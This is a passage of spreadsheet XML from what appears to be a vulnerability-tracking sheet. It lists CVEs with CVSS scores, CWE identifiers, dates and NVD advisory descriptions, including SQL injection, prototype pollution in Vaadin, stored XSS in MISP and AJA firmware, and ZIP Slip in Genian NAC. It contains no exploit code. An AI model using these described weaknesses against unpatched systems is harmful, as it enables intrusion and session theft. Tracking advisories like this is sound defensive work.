          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103541</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103543</t>
        </is>
      </c>
      <c r="D446" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E446" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="inlineStr"/>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K446" s="5" t="inlineStr"/>
      <c r="L446" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q446" s="5" t="inlineStr"/>
      <c r="R446" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S446" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in itsourcecode Leave Management System 1.0. The affected element is an unknown function of the file /module/leavetype/controller.php. Such manipulation of the argument LEAVTID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="T446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103543</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91860</t>
        </is>
      </c>
      <c r="D447" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E447" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F447" s="5" t="inlineStr">
        <is>
          <t>security@vaadin.com</t>
        </is>
      </c>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="inlineStr"/>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr">
        <is>
          <t>npm, maven, gin</t>
        </is>
      </c>
      <c r="K447" s="5" t="inlineStr"/>
      <c r="L447" s="5" t="inlineStr"/>
      <c r="M447" s="5" t="inlineStr"/>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P447" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q447" s="5" t="inlineStr"/>
      <c r="R447" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S447" s="5" t="inlineStr">
        <is>
          <t>A prototype pollution vulnerability exists in the deep merge helpers of Vaadin Charts and Vaadin Component Base. Merging an object the application does not control into a chart configuration or into a component's i18n property writes onto Object.prototype, making the injected properties visible to every object in the running application.
Users of affected versions should apply the following mitigation or upgrade. Releases that have fixed this issue include:
Product version
Vaadin 23.0.0 - 23.6.13
Vaadin 24.0.0 - 24.9.20
Vaadin 24.10.0 - 24.10.9
Vaadin 25.0.0 - 25.1.11
Vaadin 25.2.0 - 25.2.6
Mitigation
Upgrade to 23.6.14
Upgrade to 24.9.21
Upgrade to 24.10.10
Upgrade to 25.1.12
Upgrade to 25.2.7 or newer
Please note that Vaadin versions 10-13 and 15-22 are no longer supported and you should update either to the latest 23, 24, 25 version.
Artifacts
Maven coordinates Vulnerable versions Fixed version
com.vaadin:vaadin 23.0.0 - 23.6.13 &gt;=23.6.14
com.vaadin:vaadin 24.0.0 - 24.9.20 &gt;=24.9.21
com.vaadin:vaadin 24.10.0 - 24.10.9 &gt;=24.10.10
com.vaadin:vaadin 25.0.0 - 25.1.11 &gt;=25.1.12
com.vaadin:vaadin 25.2.0 - 25.2.6 &gt;=25.2.7
com.vaadin:vaadin-core 24.7.0 - 24.9.20 &gt;=24.9.21
com.vaadin:vaadin-core 24.10.0 - 24.10.9 &gt;=24.10.10
com.vaadin:vaadin-core 25.0.0 - 25.1.11 &gt;=25.1.12
com.vaadin:vaadin-core 25.2.0 - 25.2.6 &gt;=25.2.7
com.vaadin:vaadin-charts-flow 23.0.0 - 23.6.13 &gt;=23.6.14
com.vaadin:vaadin-charts-flow 24.0.0 - 24.9.20 &gt;=24.9.21
com.vaadin:vaadin-charts-flow 24.10.0 - 24.10.9 &gt;=24.10.10
com.vaadin:vaadin-charts-flow 25.0.0 - 25.1.11 &gt;=25.1.12
com.vaadin:vaadin-charts-flow 25.2.0 - 25.2.6 &gt;=25.2.7
npm packages
npm package Vulnerable versions Fixed version
@vaadin/charts 23.0.0 - 23.6.4 &gt;=23.6.5
@vaadin/charts 24.0.0 - 24.9.17 &gt;=24.9.18
@vaadin/charts 24.10.0 - 24.10.4 &gt;=24.10.5
@vaadin/charts 25.0.0 - 25.1.11 &gt;=25.1.12
@vaadin/charts 25.2.0 - 25.2.8 &gt;=25.2.9
@vaadin/component-base 24.7.0 - 24.9.17 &gt;=24.9.18
@vaadin/component-base 24.10.0 - 24.10.4 &gt;=24.10.5
@vaadin/component-base 25.0.0 - 25.1.11 &gt;=25.1.12
@vaadin/component-base 25.2.0 - 25.2.8 &gt;=25.2.9</t>
        </is>
      </c>
      <c r="T447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91860</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96821</t>
        </is>
      </c>
      <c r="D448" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E448" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F448" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="inlineStr"/>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr"/>
      <c r="L448" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q448" s="5" t="inlineStr"/>
      <c r="R448" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S448" s="5" t="inlineStr">
        <is>
          <t>Subscriber Privilege Escalation in FluentBoards &lt;= 2.0.12 versions.</t>
        </is>
      </c>
      <c r="T448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96821</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103388</t>
        </is>
      </c>
      <c r="D449" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E449" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F449" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="inlineStr"/>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K449" s="5" t="inlineStr"/>
      <c r="L449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q449" s="5" t="inlineStr"/>
      <c r="R449" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S449" s="5" t="inlineStr">
        <is>
          <t>MISP renders the source field of a Galaxy Cluster as a clickable hyperlink whenever the stored value passes PHP's FILTER_VALIDATE_URL validation. Because FILTER_VALIDATE_URL accepts the javascript: URI scheme, a user with galaxy editor privileges on the local instance or on a synced instance could store a javascript: URL as the cluster source.
When another user views the affected Galaxy Cluster and clicks the rendered link, the embedded script executes in the victim's browser context, enabling session hijacking, data exfiltration, or actions performed on behalf of the victim.
Preconditions:
- Attacker must hold galaxy editor privileges (local or via sync).
- Victim must view the affected cluster and click the malicious link.
Impact:
- Stored cross-site scripting (XSS) in the victim's browser.
- Potential session theft, credential harvesting, or unauthorized actions within the MISP application.
Affected: &lt;2.5.48.</t>
        </is>
      </c>
      <c r="T449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103388</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103389</t>
        </is>
      </c>
      <c r="D450" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E450" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F450" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="inlineStr"/>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K450" s="5" t="inlineStr"/>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q450" s="5" t="inlineStr"/>
      <c r="R450" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="S450" s="5" t="inlineStr">
        <is>
          <t>MISP contains a stored cross-site scripting (XSS) vulnerability in the galaxy icon handling path. The icon field of a galaxy object was persisted without any server-side validation through the galaxy add, edit, and sync/import capture endpoints. The stored value was subsequently concatenated directly into HTML markup by the D3-based correlation graph rendering scripts (both the default and Overmind themes) using the .html() method.
A user holding the perm_galaxy_editor permission, which is granted to the stock User role, could store arbitrary HTML or JavaScript in the icon field. Any other user who opened the correlation graph of an event containing a cluster belonging to that galaxy would have the injected script executed in their browser session.
Impact:
- Arbitrary script execution in the context of the victim's MISP session
- Potential theft of session credentials, manipulation of displayed data, or initiation of actions on behalf of the victim
- Affects both the default and Overmind UI themes
Affected versions: &lt;2.5.48</t>
        </is>
      </c>
      <c r="T450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103389</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47096</t>
        </is>
      </c>
      <c r="D451" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E451" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="inlineStr"/>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr"/>
      <c r="L451" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P451" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q451" s="5" t="inlineStr"/>
      <c r="R451" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S451" s="5" t="inlineStr">
        <is>
          <t>AJA HELO Plus firmware before 2.1.7 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers with network access to inject malicious JavaScript by setting an unsanitized eParamID_SystemName value through the /config?action=set web configuration API. Attackers can exploit this flaw when device authentication is disabled to persistently execute arbitrary script in the browser of any administrator who opens the web management interface, enabling theft of stored secrets such as web UI credentials, RTMP stream keys, publish URLs, and NFS/SMB share credentials, as well as hijacking of the authenticated session.</t>
        </is>
      </c>
      <c r="T451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47096</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47518</t>
        </is>
      </c>
      <c r="D452" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E452" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F452" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="inlineStr"/>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr"/>
      <c r="L452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q452" s="5" t="inlineStr"/>
      <c r="R452" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="S452" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in a secure microcontroller component, where incorrect permission assignment for a critical resource allows an attacker with privileged local access to modify protected memory that should be restricted. A successful exploit of this vulnerability might lead to code execution and escalation of privileges.</t>
        </is>
      </c>
      <c r="T452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47518</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100267</t>
        </is>
      </c>
      <c r="D453" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E453" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F453" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="inlineStr"/>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr"/>
      <c r="K453" s="5" t="inlineStr"/>
      <c r="L453" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q453" s="5" t="inlineStr"/>
      <c r="R453" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S453" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 reDoS attack was possible via mailbox regex mail-rule filters</t>
        </is>
      </c>
      <c r="T453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100267</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100276</t>
        </is>
      </c>
      <c r="D454" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E454" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F454" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="inlineStr"/>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr"/>
      <c r="K454" s="5" t="inlineStr"/>
      <c r="L454" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q454" s="5" t="inlineStr"/>
      <c r="R454" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S454" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 guest users could remove a workflow action's visibility restriction and run the action</t>
        </is>
      </c>
      <c r="T454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100276</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102110</t>
        </is>
      </c>
      <c r="D455" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E455" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F455" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="inlineStr"/>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr"/>
      <c r="K455" s="5" t="inlineStr"/>
      <c r="L455" s="5" t="inlineStr"/>
      <c r="M455" s="5" t="inlineStr"/>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q455" s="5" t="inlineStr"/>
      <c r="R455" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-670</t>
        </is>
      </c>
      <c r="S455" s="5" t="inlineStr">
        <is>
          <t>An endpoint used during initial appliance setup did not require authentication and did not correctly enforce its intended state precondition, so during the initial activation window an unauthenticated network attacker could repeatedly re-trigger the privileged activation process. This could disrupt setup and leave the appliance in an incompletely configured state. The issue is only reachable while an appliance is being activated for the first time and not yet fully configured.</t>
        </is>
      </c>
      <c r="T455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102110</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102384</t>
        </is>
      </c>
      <c r="D456" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E456" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F456" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="inlineStr"/>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr"/>
      <c r="K456" s="5" t="inlineStr"/>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q456" s="5" t="inlineStr"/>
      <c r="R456" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S456" s="5" t="inlineStr">
        <is>
          <t>Author Cross Site Scripting (XSS) in Supreme Modules Lite &lt;= 2.5.63 versions.</t>
        </is>
      </c>
      <c r="T456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102384</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55174</t>
        </is>
      </c>
      <c r="D457" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E457" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F457" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="inlineStr"/>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K457" s="5" t="inlineStr"/>
      <c r="L457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q457" s="5" t="inlineStr"/>
      <c r="R457" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347</t>
        </is>
      </c>
      <c r="S457" s="5" t="inlineStr">
        <is>
          <t>UltrafastSecp256k1 is a high-performance, multi-backend secp256k1 engine with reproducible audit evidence, compatibility shims, and profile-based review scopes. Prior to version 4.2.0, UltrafastSecp256k1's ECDSA adaptor pre-signature verification accepts forged adaptor pre-signatures whose "r" value is not cryptographically bound to the adaptor point "T". This issue has been patched in version 4.2.0.</t>
        </is>
      </c>
      <c r="T457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55174</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76147</t>
        </is>
      </c>
      <c r="D458" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E458" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F458" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="inlineStr"/>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr"/>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q458" s="5" t="inlineStr"/>
      <c r="R458" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-807, CWE-862</t>
        </is>
      </c>
      <c r="S458" s="5" t="inlineStr">
        <is>
          <t>A path traversal (ZIP Slip) vulnerability caused by insufficient authorization and integrity verification in the agent upgrade feature of Genian NAC/ZTNA allows a remote attacker to execute arbitrary code</t>
        </is>
      </c>
      <c r="T458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76147</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94681</t>
        </is>
      </c>
      <c r="D459" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E459" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F459" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="inlineStr"/>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr"/>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q459" s="5" t="inlineStr"/>
      <c r="R459" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S459" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Denial of Service Attack in WP Store Locator &lt; 3.0.0 versions.</t>
        </is>
      </c>
      <c r="T459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94681</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103243</t>
        </is>
      </c>
      <c r="D460" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E460" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="inlineStr"/>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr"/>
      <c r="L460" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q460" s="5" t="inlineStr"/>
